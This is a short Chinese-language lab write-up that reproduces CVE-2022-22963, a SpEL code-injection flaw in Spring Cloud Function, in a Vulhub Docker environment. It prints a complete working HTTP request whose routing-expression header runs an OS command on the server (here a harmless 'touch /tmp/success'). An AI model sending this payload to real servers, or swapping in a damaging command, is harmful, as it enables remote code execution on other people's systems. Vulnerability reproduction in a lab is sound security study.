Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现

文章目录

  • Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)漏洞复现
    • 一、复现环境
    • 二、复现过程

Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)漏洞复现

一、复现环境

Vulhub:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22963

二、复现过程

  1. 拉取docker环境
    Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现_第1张图片
    服务启动后,可通过地址:http://your-ip:8080 查看。
  2. 攻击载荷

使用bp回放Send有效载荷(请求方法为POST)

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

进入容器可查看命令成功执行:

在这里插入图片描述

你可能感兴趣的:(#,靶场测试,#,漏洞复现,spring,cloud,java,spring)